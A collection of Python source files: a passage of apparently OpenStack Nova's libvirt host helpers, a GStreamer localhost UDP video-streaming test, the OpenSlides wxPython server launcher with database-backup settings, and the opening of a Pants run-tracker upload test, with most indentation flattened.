# And if we passed an alias, register the domain caps
# under that too.
if machine_type and machine_type != cap_obj.machine_type:
domain_caps[arch][machine_type] = cap_obj
cap_obj.machine_type_alias = machine_type
# NOTE(aspiers): Use a temporary variable to update the
# instance variable atomically, otherwise if some API
# calls succeeded and then one failed, we might
# accidentally memoize a partial result.
self._domain_caps = domain_caps
return self._domain_caps
def _get_domain_capabilities(self, emulator_bin=None, arch=None,
machine_type=None, virt_type=None, flags=0):
xmlstr = self.get_connection().getDomainCapabilities(
emulator_bin,
arch,
machine_type,
virt_type,
flags
)
LOG.debug("Libvirt host hypervisor capabilities for arch=%s and "
"machine_type=%s:\n%s", arch, machine_type, xmlstr)
caps = vconfig.LibvirtConfigDomainCaps()
caps.parse_str(xmlstr)
return caps
def get_driver_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self.get_connection().getType()
def get_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
return self.get_connection().getVersion()
def get_hostname(self):
"""Returns the hostname of the hypervisor."""
hostname = self.get_connection().getHostname()
if self._hostname is None:
self._hostname = hostname
elif hostname != self._hostname:
LOG.error('Hostname has changed from %(old)s '
'to %(new)s. A restart is required to take effect.',
{'old': self._hostname, 'new': hostname})
return self._hostname
def find_secret(self, usage_type, usage_id):
"""Find a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
if usage_type == 'iscsi':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_ISCSI
elif usage_type in ('rbd', 'ceph'):
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_CEPH
elif usage_type == 'volume':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_VOLUME
else:
msg = _("Invalid usage_type: %s")
raise exception.InternalError(msg % usage_type)
try:
conn = self.get_connection()
return conn.secretLookupByUsage(usage_type_const, usage_id)
except libvirt.libvirtError as e:
if e.get_error_code() == libvirt.VIR_ERR_NO_SECRET:
return None
def create_secret(self, usage_type, usage_id, password=None):
"""Create a secret.
:param usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
'rbd' will be converted to 'ceph'.
:param usage_id: name of resource in secret
:param password: optional secret value to set
"""
secret_conf = vconfig.LibvirtConfigSecret()
secret_conf.ephemeral = False
secret_conf.private = False
secret_conf.usage_id = usage_id
if usage_type in ('rbd', 'ceph'):
secret_conf.usage_type = 'ceph'
elif usage_type == 'iscsi':
secret_conf.usage_type = 'iscsi'
elif usage_type == 'volume':
secret_conf.usage_type = 'volume'
else:
msg = _("Invalid usage_type: %s")
raise exception.InternalError(msg % usage_type)
xml = secret_conf.to_xml()
try:
LOG.debug('Secret XML: %s', xml)
conn = self.get_connection()
secret = conn.secretDefineXML(xml)
if password is not None:
secret.setValue(password)
return secret
except libvirt.libvirtError:
with excutils.save_and_reraise_exception():
LOG.error('Error defining a secret with XML: %s', xml)
def delete_secret(self, usage_type, usage_id):
"""Delete a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
secret = self.find_secret(usage_type, usage_id)
if secret is not None:
secret.undefine()
def _get_hardware_info(self):
"""Returns hardware information about the Node.
Note that the memory size is reported in MiB instead of KiB.
"""
return self.get_connection().getInfo()
def get_cpu_count(self):
"""Returns the total numbers of cpu in the host."""
return self._get_hardware_info()[2]
def get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
if CONF.libvirt.file_backed_memory > 0:
return CONF.libvirt.file_backed_memory
else:
return self._get_hardware_info()[1]
def _sum_domain_memory_mb(self, include_host=True):
"""Get the total memory consumed by guest domains
        If include_host is True, subtract available host memory from guest 0
        to get the real memory used by dom0 under Xen.
"""
used = 0
for guest in self.list_guests(only_guests=False):
try:
# TODO(sahid): Use get_info...
dom_mem = int(guest._get_domain_info()[2])
except libvirt.libvirtError as e:
LOG.warning("couldn't obtain the memory from domain:"
" %(uuid)s, exception: %(ex)s",
{"uuid": guest.uuid, "ex": e})
continue
if include_host and guest.id == 0:
# Memory usage for the host domain (dom0 in xen) is the
# reported memory minus available memory
used += (dom_mem - self._get_avail_memory_kb())
else:
used += dom_mem
# Convert it to MB
return used // units.Ki
@staticmethod
def _get_avail_memory_kb():
with open('/proc/meminfo') as fp:
m = fp.read().split()
idx1 = m.index('MemFree:')
idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
avail = int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1])
return avail
def get_memory_mb_used(self):
"""Get the used memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
        if not sys.platform.startswith('linux'):
return 0
if CONF.libvirt.virt_type == 'xen':
            # For xen, report the sum of all domains, with dom0's real
            # memory usage included
return self._sum_domain_memory_mb(include_host=True)
elif CONF.libvirt.file_backed_memory > 0:
# For file_backed_memory, report the total usage of guests,
# ignoring host memory
return self._sum_domain_memory_mb(include_host=False)
else:
return (self.get_memory_mb_total() -
(self._get_avail_memory_kb() // units.Ki))
def get_cpu_stats(self):
"""Returns the current CPU state of the host with frequency."""
stats = self.get_connection().getCPUStats(
libvirt.VIR_NODE_CPU_STATS_ALL_CPUS, 0)
        # getInfo() returns various information about the host node;
        # index 3 of the returned list is the current CPU frequency (MHz).
stats["frequency"] = self._get_hardware_info()[3]
return stats
def write_instance_config(self, xml):
"""Defines a domain, but does not start it.
:param xml: XML domain definition of the guest.
:returns: an instance of Guest
"""
if six.PY2:
xml = encodeutils.safe_encode(xml)
domain = self.get_connection().defineXML(xml)
return libvirt_guest.Guest(domain)
def device_lookup_by_name(self, name):
"""Lookup a node device by its name.
:returns: a virNodeDevice instance
"""
return self.get_connection().nodeDeviceLookupByName(name)
def list_pci_devices(self, flags=0):
"""Lookup pci devices.
:returns: a list of virNodeDevice instance
"""
# TODO(sbauza): Replace that call by a generic _list_devices("pci")
return self.get_connection().listDevices("pci", flags)
def list_mdev_capable_devices(self, flags=0):
"""Lookup devices supporting mdev capabilities.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("mdev_types", flags=flags)
def list_mediated_devices(self, flags=0):
"""Lookup mediated devices.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("mdev", flags=flags)
def _list_devices(self, cap, flags=0):
"""Lookup devices.
:returns: a list of virNodeDevice instance
"""
try:
return self.get_connection().listDevices(cap, flags)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warning("URI %(uri)s does not support "
"listDevices: %(error)s",
{'uri': self._uri, 'error': ex})
return []
else:
raise
def compare_cpu(self, xmlDesc, flags=0):
"""Compares the given CPU description with the host CPU."""
return self.get_connection().compareCPU(xmlDesc, flags)
def is_cpu_control_policy_capable(self):
"""Returns whether kernel configuration CGROUP_SCHED is enabled
CONFIG_CGROUP_SCHED may be disabled in some kernel configs to
improve scheduler latency.
"""
try:
with open("/proc/self/mounts", "r") as fd:
for line in fd.readlines():
                    # the fourth field holds the mount options; split on ","
bits = line.split()[3].split(",")
if "cpu" in bits:
return True
return False
except IOError:
return False
|
Gtest.py
|
import cv2
import numpy as np
from multiprocessing import Process
def send():
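    # Capture synthetic frames from GStreamer's videotestsrc, re-encode them
    # with x264 and stream them as RTP/H.264 over UDP to 127.0.0.1:8888.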
cap_send = cv2.VideoCapture('videotestsrc ! video/x-raw,framerate=20/1 ! videoscale ! videoconvert ! appsink', cv2.CAP_GSTREAMER)
out_send = cv2.VideoWriter('appsrc ! videoconvert ! x264enc tune=zerolatency bitrate=500 speed-preset=superfast ! rtph264pay ! udpsink host=127.0.0.1 port=8888',cv2.CAP_GSTREAMER,0, 20, (320,240), True)
if not cap_send.isOpened() or not out_send.isOpened():
print('VideoCapture or VideoWriter not opened')
exit(0)
print('Start sending.')
while True:
ret,frame = cap_send.read()
if not ret:
print('empty frame')
break
out_send.write(frame)
# cv2.imshow('send', frame)
# if cv2.waitKey(1)&0xFF == ord('q'):
# break
cap_send.release()
out_send.release()
def receive():
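    # Receive the RTP/H.264 stream on UDP port 8888, depayload and decode it,
    # and pull the raw frames back into OpenCV through appsink.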
cap_receive = cv2.VideoCapture('udpsrc port=8888 caps = "application/x-rtp, media=(string)video, clock-rate=(int)90000, encoding-name=(string)H264, payload=(int)96" ! rtph264depay ! decodebin ! videoconvert ! appsink', cv2.CAP_GSTREAMER)
if not cap_receive.isOpened():
print('VideoCapture not opened')
exit(0)
print('Start receiving.')
while True:
ret,frame = cap_receive.read()
if not ret:
print('empty frame')
break
# cv2.imshow('receive', frame)
print('test')
# if cv2.waitKey(1)&0xFF == ord('q'):
# break
#cap_receive.release()
if __name__ == '__main__':
s = Process(target=send)
r = Process(target=receive)
s.start()
r.start()
s.join()
r.join()
cv2.destroyAllWindows()
|
gui.py
|
import datetime
import errno
import gettext
import itertools
import json
import locale
import os
import queue
import signal
import subprocess
import sys
import threading
import wx
import wx.adv
import openslides
from openslides.utils.main import (
detect_openslides_type,
get_default_user_data_dir,
PortableDirNotWritable,
)
_translations = gettext.NullTranslations()
_ = lambda text: _translations.gettext(text)
ngettext = lambda msg1, msg2, n: _translations.ngettext(msg1, msg2, n)
def get_data_path(*args):
return os.path.join(os.path.dirname(__file__), "data", *args)
class RunCmdEvent(wx.PyCommandEvent):
def __init__(self, evt_type, evt_id):
super(RunCmdEvent, self).__init__(evt_type, evt_id)
self.running = False
self.exitcode = None
EVT_RUN_CMD_ID = wx.NewEventType()
EVT_RUN_CMD = wx.PyEventBinder(EVT_RUN_CMD_ID, 1)
class RunCommandControl(wx.Panel):
UPDATE_INTERVAL = 500
def __init__(self, parent):
super(RunCommandControl, self).__init__(parent)
self.child_process = None
self.output_queue = queue.Queue()
self.output_read_thread = None
self.output_mutex = threading.RLock()
vbox = wx.BoxSizer(wx.VERTICAL)
self.te_output = wx.TextCtrl(
self, style=wx.TE_MULTILINE | wx.TE_READONLY | wx.HSCROLL)
vbox.Add(self.te_output, 1, wx.EXPAND)
self.update_timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.on_update_timer, self.update_timer)
self.SetSizerAndFit(vbox)
def _read_output(self):
while True:
# NOTE: don't use iterator interface since it uses an
# internal buffer and we don't see output in a timely fashion
line = self.child_process.stdout.readline()
if not line:
break
self.output_queue.put(line)
def is_alive(self):
if self.child_process is None:
return False
return self.child_process.poll() is None
def run_command(self, *args):
if self.is_alive():
raise ValueError("already running a command")
cmd = [sys.executable, "-u", "-m", "openslides"]
cmd.extend(args)
creationflags = getattr(subprocess, "CREATE_NEW_PROCESS_GROUP", 0)
self.child_process = subprocess.Popen(
cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, creationflags=creationflags)
self.child_process.stdin.close()
self.output_read_thread = threading.Thread(target=self._read_output)
self.output_read_thread.start()
self.update_timer.Start(self.UPDATE_INTERVAL)
evt = RunCmdEvent(EVT_RUN_CMD_ID, self.GetId())
evt.running = True
self.GetEventHandler().ProcessEvent(evt)
def cancel_command(self):
if not self.is_alive():
return
self.te_output.AppendText(_("Stopping server..."))
# kill the main process (without killing browser)
os.kill(self.child_process.pid, signal.SIGINT)
def on_update_timer(self, evt):
is_alive = self.is_alive()
if not is_alive:
# join thread to make sure everything was read
self.output_read_thread.join(5)
if self.output_read_thread.is_alive():
self.te_output.AppendText(
"Internal error: failed to join output reader thread")
self.output_read_thread = None
for line_no in itertools.count():
try:
data = self.output_queue.get(block=False)
except queue.Empty:
break
else:
# XXX: check whether django uses utf-8 or locale for
                    # its cli output
text = data.decode("utf-8", errors="replace")
with self.output_mutex:
self.te_output.AppendText(text)
# avoid waiting too long here if child is still alive
if is_alive and line_no > 10:
break
if not is_alive:
exitcode = self.child_process.returncode
self.update_timer.Stop()
self.child_process = None
evt = RunCmdEvent(EVT_RUN_CMD_ID, self.GetId())
evt.running = False
evt.exitcode = exitcode
self.GetEventHandler().ProcessEvent(evt)
def append_message(self, text, newline="\n"):
with self.output_mutex:
self.te_output.AppendText(text + newline)
class SettingsDialog(wx.Dialog):
def __init__(self, parent):
super(SettingsDialog, self).__init__(parent, wx.ID_ANY, _("Settings"))
grid = wx.GridBagSizer(5, 5)
row = 0
lb_host = wx.StaticText(self, label=_("&Host:"))
grid.Add(lb_host, pos=(row, 0))
self.tc_host = wx.TextCtrl(self)
grid.Add(self.tc_host, pos=(row, 1), flag=wx.EXPAND)
row += 1
lb_port = wx.StaticText(self, label=_("&Port:"))
grid.Add(lb_port, pos=(row, 0))
self.tc_port = wx.TextCtrl(self)
grid.Add(self.tc_port, pos=(row, 1), flag=wx.EXPAND)
row += 1
self.cb_use_geiss = wx.CheckBox(
self, label=_("&Use Geiss and Redis (experimental, 64bit only)"))
self.cb_use_geiss.SetValue(False)
grid.Add(self.cb_use_geiss, pos=(row, 0), span=(1, 3))
row += 1
sizer = self.CreateButtonSizer(wx.OK | wx.CANCEL)
        if sizer is not None:
grid.Add(0, 0, pos=(row, 0), span=(1, 2))
row += 1
grid.Add(sizer, pos=(row, 0), span=(1, 2))
box = wx.BoxSizer(wx.VERTICAL)
box.Add(
grid, flag=wx.EXPAND | wx.ALL | wx.ALIGN_CENTER_VERTICAL,
border=5, proportion=1)
self.SetSizerAndFit(box)
@property
def host(self):
return self.tc_host.GetValue()
@host.setter
def host(self, host):
self.tc_host.SetValue(host)
@property
def port(self):
return self.tc_port.GetValue()
@port.setter
def port(self, port):
self.tc_port.SetValue(port)
@property
def use_geiss(self):
return self.cb_use_geiss.GetValue()
@use_geiss.setter
def use_geiss(self, use_geiss):
self.cb_use_geiss.SetValue(use_geiss)
class BackupSettingsDialog(wx.Dialog):
# NOTE: keep order in sync with _update_interval_choices()
_INTERVAL_UNITS = ["second", "minute", "hour"]
def __init__(self, parent):
super(BackupSettingsDialog, self).__init__(
parent, wx.ID_ANY, _("Database backup"))
self._interval_units = {}
grid = wx.GridBagSizer(5, 5)
row = 0
self.cb_backup = wx.CheckBox(
self, label=_("&Regularly backup database"))
self.cb_backup.SetValue(True)
self.cb_backup.Bind(wx.EVT_CHECKBOX, self.on_backup_checked)
grid.Add(self.cb_backup, pos=(row, 0), span=(1, 3))
row += 1
lb_dest = wx.StaticText(self, label=_("&Destination:"))
grid.Add(lb_dest, pos=(row, 0))
style = wx.FLP_SAVE | wx.FLP_USE_TEXTCTRL
self.fp_dest = wx.FilePickerCtrl(self, style=style)
grid.Add(self.fp_dest, pos=(row, 1), span=(1, 2), flag=wx.EXPAND)
row += 1
lb_interval = wx.StaticText(self, label=_("&Every"))
grid.Add(lb_interval, pos=(row, 0))
self.sb_interval = wx.SpinCtrl(self, min=1, initial=1)
self.sb_interval.Bind(wx.EVT_SPINCTRL, self.on_interval_changed)
grid.Add(self.sb_interval, pos=(row, 1))
self.ch_interval_unit = wx.Choice(self)
grid.Add(self.ch_interval_unit, pos=(row, 2))
row += 1
grid.AddGrowableCol(1)
sizer = self.CreateButtonSizer(wx.OK | wx.CANCEL)
        if sizer is not None:
grid.Add(0, 0, pos=(row, 0), span=(1, 3))
row += 1
grid.Add(sizer, pos=(row, 0), span=(1, 3))
box = wx.BoxSizer(wx.VERTICAL)
box.Add(
grid, flag=wx.EXPAND | wx.ALL | wx.ALIGN_CENTER_VERTICAL,
border=5, proportion=1)
self.SetSizerAndFit(box)
self._update_interval_choices()
self._update_backup_enabled()
@property
def backupdb_enabled(self):
return self.cb_backup.GetValue()
@backupdb_enabled.setter
def backupdb_enabled(self, enabled):
self.cb_backup.SetValue(enabled)
self._update_backup_enabled()
@property
def backupdb_destination(self):
return self.fp_dest.GetPath()
@backupdb_destination.setter
def backupdb_destination(self, path):
self.fp_dest.SetPath(path)
@property
def interval(self):
return self.sb_interval.GetValue()
@interval.setter
def interval(self, value):
self.sb_interval.SetValue(value)
self._update_interval_choices()
@property
def interval_unit(self):
return self._INTERVAL_UNITS[self.ch_interval_unit.GetSelection()]
@interval_unit.setter
def interval_unit(self, unit):
try:
idx = self._INTERVAL_UNITS.index(unit)
        except ValueError:
raise ValueError("Unknown unit {0}".format(unit))
self.ch_interval_unit.SetSelection(idx)
def _update_interval_choices(self):
count = self.sb_interval.GetValue()
choices = [
ngettext("second", "seconds", count),
ngettext("minute", "minutes", count),
ngettext("hour", "hours", count),
]
current = self.ch_interval_unit.GetSelection()
if current == wx.NOT_FOUND:
current = 2 # default to hour
self.ch_interval_unit.Clear()
self.ch_interval_unit.AppendItems(choices)
self.ch_interval_unit.SetSelection(current)
def _update_backup_enabled(self):
checked = self.cb_backup.IsChecked()
self.fp_dest.Enable(checked)
self.sb_interval.Enable(checked)
self.ch_interval_unit.Enable(checked)
def on_backup_checked(self, evt):
self._update_backup_enabled()
def on_interval_changed(self, evt):
self._update_interval_choices()
# TODO: validate settings on close (e.g. non-empty path if backup is
# enabled)
class MainWindow(wx.Frame):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent, title="OpenSlides")
icons = wx.IconBundle(
get_data_path("openslides.ico"),
wx.BITMAP_TYPE_ICO)
self.SetIcons(icons)
self.server_running = False
self.gui_settings_path = None
self.gui_initialized = False
self.backupdb_enabled = False
self.backupdb_destination = ""
self.backupdb_interval = 15
self.backupdb_interval_unit = "minute"
self.last_backup = None
self.backup_timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.on_backup_timer, self.backup_timer)
spacing = 5
panel = wx.Panel(self)
grid = wx.GridBagSizer(spacing, spacing)
# logo & about button
logo_box = wx.BoxSizer(wx.HORIZONTAL)
grid.Add(logo_box, pos=(0, 0), flag=wx.EXPAND)
row = 0
fp = get_data_path("openslides-logo_wide.png")
with open(fp, "rb") as f:
logo_wide_bmp = wx.Image(f).ConvertToBitmap()
logo_wide = wx.StaticBitmap(panel, wx.ID_ANY, logo_wide_bmp)
logo_box.AddSpacer(2 * spacing)
logo_box.Add(logo_wide)
logo_box.AddStretchSpacer()
version_str = _("Version {0}").format(openslides.__version__)
lb_version = wx.StaticText(panel, label=version_str)
font = lb_version.GetFont()
font.SetPointSize(8)
lb_version.SetFont(font)
logo_box.Add(lb_version, flag=wx.ALIGN_CENTER_VERTICAL)
self.bt_about = wx.Button(panel, label=_("&About..."))
self.bt_about.Bind(wx.EVT_BUTTON, self.on_about_clicked)
grid.Add(self.bt_about, pos=(row, 1), flag=wx.ALIGN_CENTER_VERTICAL)
row += 1
grid.Add(0, spacing, pos=(row, 0), span=(1, 2))
row += 1
# server settings
server_settings = wx.StaticBox(panel, wx.ID_ANY, _("Server Settings"))
server_box = wx.StaticBoxSizer(server_settings, wx.VERTICAL)
grid.Add(server_box, pos=(row, 0), flag=wx.EXPAND)
self._host = None
self._port = None
self.use_geiss = False
hbox = wx.BoxSizer(wx.HORIZONTAL)
server_box.Add(hbox, flag=wx.EXPAND)
self.lb_host = wx.StaticText(panel)
hbox.Add(self.lb_host, flag=wx.ALIGN_CENTER_VERTICAL)
hbox.AddStretchSpacer()
self.lb_port = wx.StaticText(panel)
hbox.Add(self.lb_port, flag=wx.ALIGN_CENTER_VERTICAL)
hbox.AddStretchSpacer()
self.bt_settings = wx.Button(panel, label=_("S&ettings..."))
self.bt_settings.Bind(wx.EVT_BUTTON, self.on_settings_clicked)
hbox.Add(self.bt_settings)
server_box.AddSpacer(spacing)
self.cb_start_browser = wx.CheckBox(
panel, label=_("Automatically open &browser"))
self.cb_start_browser.SetValue(True)
server_box.Add(self.cb_start_browser)
server_box.AddStretchSpacer()
server_box.AddSpacer(spacing)
self.bt_server = wx.Button(panel, label=_("&Start server"))
self.bt_server.Bind(wx.EVT_BUTTON, self.on_start_server_clicked)
server_box.Add(self.bt_server, flag=wx.EXPAND)
self.host = "0.0.0.0"
self.port = "8000"
# "action" buttons
action_vbox = wx.BoxSizer(wx.VERTICAL)
action_vbox.AddSpacer(3 * spacing)
grid.Add(action_vbox, pos=(row, 1))
self.bt_backup = wx.Button(panel, label=_("&Backup database..."))
self.bt_backup.Bind(wx.EVT_BUTTON, self.on_backup_clicked)
action_vbox.Add(self.bt_backup)
action_vbox.AddSpacer(spacing)
self.bt_sync_db = wx.Button(panel, label=_("S&ync database"))
self.bt_sync_db.Bind(wx.EVT_BUTTON, self.on_syncdb_clicked)
action_vbox.Add(self.bt_sync_db)
action_vbox.AddSpacer(spacing)
self.bt_reset_admin = wx.Button(panel, label=_("&Reset admin"))
self.bt_reset_admin.Bind(wx.EVT_BUTTON, self.on_reset_admin_clicked)
action_vbox.Add(self.bt_reset_admin)
row += 1
# command output
self.cmd_run_ctrl = RunCommandControl(panel)
self.cmd_run_ctrl.Bind(EVT_RUN_CMD, self.on_run_cmd_changed)
grid.Add(
self.cmd_run_ctrl,
pos=(row, 0), span=(1, 2),
flag=wx.EXPAND)
grid.AddGrowableCol(0)
grid.AddGrowableRow(3)
box = wx.BoxSizer(wx.VERTICAL)
box.Add(
grid, flag=wx.EXPAND | wx.ALL | wx.ALIGN_CENTER_VERTICAL,
border=spacing, proportion=1)
panel.SetSizerAndFit(box)
self.Fit()
self.SetMinSize(self.ClientToWindowSize(box.GetMinSize()))
self.SetInitialSize(wx.Size(500, 400))
self.Bind(wx.EVT_CLOSE, self.on_close)
def initialize_gui(self):
if self.gui_initialized:
return True
# Set path for gui settings to default user data according to the
# OpenSlides type. This does not depend on any argument the user might
# type in.
openslides_type = detect_openslides_type()
try:
default_user_data_path = get_default_user_data_dir(openslides_type)
except PortableDirNotWritable:
wx.MessageBox(
_("The portable directory is not writable. Please copy the "
"openslides portable to a writeable location and start it "
"again from there"),
_("Error: Portable directory not writable"),
wx.OK | wx.ICON_ERROR)
return False
self.gui_settings_path = os.path.join(
default_user_data_path, 'openslides', 'gui_settings.json')
self.load_gui_settings()
self.apply_backup_settings()
self.gui_initialized = True
return True
@property
def backup_interval_seconds(self):
if self.backupdb_interval_unit == "second":
factor = 1
elif self.backupdb_interval_unit == "minute":
factor = 60
elif self.backupdb_interval_unit == "hour":
factor = 3600
return self.backupdb_interval * factor
@property
def host(self):
return self._host
@host.setter
def host(self, host):
self._host = host
self.lb_host.SetLabel(_("Host: {0}").format(host))
@property
def port(self):
return self._port
@port.setter
def port(self, port):
self._port = port
self.lb_port.SetLabel(_("Port: {0}").format(port))
def load_gui_settings(self):
if self.gui_settings_path is None:
return
try:
f = open(self.gui_settings_path, "r", encoding="utf-8")
except IOError as e:
if e.errno == errno.ENOENT:
return
raise
with f:
settings = json.load(f)
def setattr_unless_none(attr, value):
            if value is not None:
setattr(self, attr, value)
backup_settings = settings.get("database_backup", {})
setattr_unless_none("backupdb_enabled", backup_settings.get("enabled"))
setattr_unless_none(
"backupdb_destination", backup_settings.get("destination"))
setattr_unless_none(
"backupdb_interval", backup_settings.get("interval"))
setattr_unless_none(
"backupdb_interval_unit", backup_settings.get("interval_unit"))
last_backup = backup_settings.get("last_backup")
        if last_backup is not None:
self.last_backup = datetime.datetime.strptime(
last_backup, "%Y-%m-%d %H:%M:%S")
server_settings = settings.get("server_settings", {})
setattr_unless_none("host", server_settings.get("host"))
setattr_unless_none("port", server_settings.get("port"))
setattr_unless_none("use_geiss", server_settings.get("use_geiss"))
def save_gui_settings(self):
if self.last_backup is None:
last_backup = None
else:
last_backup = self.last_backup.strftime("%Y-%m-%d %H:%M:%S")
settings = {
"database_backup": {
"enabled": self.backupdb_enabled,
"destination": self.backupdb_destination,
"internal": self.backupdb_interval,
"interval_unit": self.backupdb_interval_unit,
"last_backup": last_backup
},
"server_settings": {
"host": self.host,
"port": self.port,
"use_geiss": self.use_geiss,
},
}
dp = os.path.dirname(self.gui_settings_path)
if not os.path.exists(dp):
os.makedirs(dp)
with open(self.gui_settings_path, "w", encoding="utf-8") as f:
json.dump(settings, f, ensure_ascii=False, indent=4)
def apply_backup_settings(self):
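        # Schedule a one-shot timer for the next backup: last backup time plus
        # the configured interval, or 30 seconds if that moment already passed.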
if self.backupdb_enabled and self.server_running:
now = datetime.datetime.utcnow()
delta = datetime.timedelta(seconds=self.backup_interval_seconds)
ref = self.last_backup
if ref is None:
ref = now
ref += delta
d = ref - now
seconds = d.days * 86400 + d.seconds
if seconds < 1:
                seconds = 30  # avoid backup immediately after start
self.backup_timer.Start(seconds * 1000, True)
else:
self.backup_timer.Stop()
def do_backup(self):
cmd = [
sys.executable, "-u", "-m", "openslides", "backupdb",
self.backupdb_destination,
]
p = subprocess.Popen(
cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
p.stdin.close()
output = p.stdout.read().strip()
exitcode = p.wait()
if output:
self.cmd_run_ctrl.append_message(output)
time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
if exitcode == 0:
self.cmd_run_ctrl.append_message(
_("{0}: Database backup successful.").format(time))
else:
self.cmd_run_ctrl.append_message(
_("{0}: Database backup failed!").format(time))
self.last_backup = datetime.datetime.utcnow()
def on_syncdb_clicked(self, evt):
self.cmd_run_ctrl.append_message(_("Syncing database..."))
self.cmd_run_ctrl.run_command("migrate")
def on_reset_admin_clicked(self, evt):
self.cmd_run_ctrl.append_message(_("Resetting admin user..."))
self.cmd_run_ctrl.run_command("createsuperuser")
def on_about_clicked(self, evt):
info = wx.adv.AboutDialogInfo()
info.SetName("OpenSlides")
info.SetVersion(openslides.__version__)
info.SetDescription(_(
"OpenSlides is a free web based presentation and "
"assembly system.\n"
"OpenSlides is free software; licensed under the MIT license."
).replace(u" ", u"\u00a0"))
info.SetCopyright(_(u"\u00a9 2011-2018 by OpenSlides team"))
info.SetWebSite("https://www.openslides.org/", "www.openslides.org")
# XXX: at least on wxgtk this has no effect
info.SetIcon(self.GetIcon())
wx.adv.AboutBox(info)
def on_start_server_clicked(self, evt):
if self.server_running:
self.cmd_run_ctrl.cancel_command()
return
args = ["--host", self._host, "--port", self._port]
if not self.cb_start_browser.GetValue():
args.append("--no-browser")
if self.use_geiss:
args.append("--use-geiss")
# run redis-server
self.cmd_run_ctrl.append_message(_("Starting redis server..."))
redis_command = os.path.join('bin', 'redis-server')
subprocess.Popen([redis_command])
self.server_running = True
self.cmd_run_ctrl.run_command("start", *args)
# initiate backup_timer if backup is enabled
self.apply_backup_settings()
self.bt_server.SetLabel(_("&Stop server"))
def on_settings_clicked(self, evt):
dlg = SettingsDialog(self)
dlg.host = self._host
dlg.port = self._port
dlg.use_geiss = self.use_geiss
if dlg.ShowModal() == wx.ID_OK:
self.host = dlg.host
self.port = dlg.port
self.use_geiss = dlg.use_geiss
def on_backup_clicked(self, evt):
dlg = BackupSettingsDialog(self)
dlg.backupdb_enabled = self.backupdb_enabled
dlg.backupdb_destination = self.backupdb_destination
dlg.interval = self.backupdb_interval
dlg.interval_unit = self.backupdb_interval_unit
if dlg.ShowModal() == wx.ID_OK:
self.backupdb_enabled = dlg.backupdb_enabled
self.backupdb_destination = dlg.backupdb_destination
self.backupdb_interval = dlg.interval
self.backupdb_interval_unit = dlg.interval_unit
self.apply_backup_settings()
def on_run_cmd_changed(self, evt):
show_completion_msg = not evt.running
if self.server_running and not evt.running:
self.bt_server.SetLabel(_("&Start server"))
self.server_running = False
self.backup_timer.Stop()
if self.backupdb_enabled:
self.do_backup()
# no operation completed msg when stopping server
show_completion_msg = False
self.bt_settings.Enable(not evt.running)
self.bt_backup.Enable(not evt.running)
self.bt_sync_db.Enable(not evt.running)
self.bt_reset_admin.Enable(not evt.running)
self.bt_server.Enable(self.server_running or not evt.running)
if show_completion_msg:
if evt.exitcode == 0:
text = _("Operation successfully completed.")
else:
text = _("Operation failed (exit code = {0})").format(
evt.exitcode)
self.cmd_run_ctrl.append_message(text)
def on_backup_timer(self, evt):
if not self.backupdb_enabled:
return
self.do_backup()
self.backup_timer.Start(1000 * self.backup_interval_seconds, True)
def on_close(self, ev):
self.cmd_run_ctrl.cancel_command()
self.save_gui_settings()
self.Destroy()
class OpenslidesApp(wx.App):
def __init__(self):
super(OpenslidesApp, self).__init__(False)
def OnInit(self):
window = MainWindow()
self.SetTopWindow(window)
if not window.initialize_gui():
self.Exit()
return False
window.Show()
return True
def main():
app = OpenslidesApp()
wx.Locale(wx.LANGUAGE_DEFAULT)
lang = locale.getdefaultlocale()[0]
if lang:
global _translations
localedir = get_data_path("locale")
_translations = gettext.translation(
"openslides_gui", localedir, [lang], fallback=True)
app.MainLoop()
if __name__ == "__main__":
main()
|
test_run_tracker.py
|
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import http.server
import json
import threading
from urllib.parse import parse_qs
from pants.auth.cookies import Cookies
from pants.goal.run_tracker import RunTracker
from pants.util.contextutil import temporary_file_path
from pants_test.test_base import TestBase
class RunTrackerTest(TestBase):
def test_upload_stats(self):
stats = {'stats': {'foo': 'bar', 'baz': 42}}
class Handler(http.server.BaseHTTPRequestHandler):
def do_POST(handler):
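        # The parameter is deliberately named "handler" (not "self") so that
        # "self" still refers to the enclosing test case for assertions.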
try:
if handler.path.startswith('/redirect'):
code = int(handler.path[-3:])
handler.send_response(code)
handler.send_header('location', mk_url('/upload'))
handler.end_headers()
else:
self.assertEqual('/upload', handler.path)
self.assertEqual('application/x-www-form-urlencoded', handler.headers['Content-type'])
length = int(handler.headers['Content-Length'])
post_data = parse_qs(handler.rfile.read(length).decode())
decoded_post_data = {k: json.loads(v[0]) for k, v in post_data.items()}
self.assertEqual(stats, decoded_post_data)
handler.send_response(200)
handler.end_headers()
except Exception:
handler.send_response(400) # Ensure the main thread knows the test failed.
raise
server_address = ('', 0)
server = http.server.HTTPServer(server_address, Handler)
host, port = server.server_address
def mk_url(path):
return 'http://{}:{}{}'.format(host, port, path)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
self.context(for_subsystems=[Cookies])
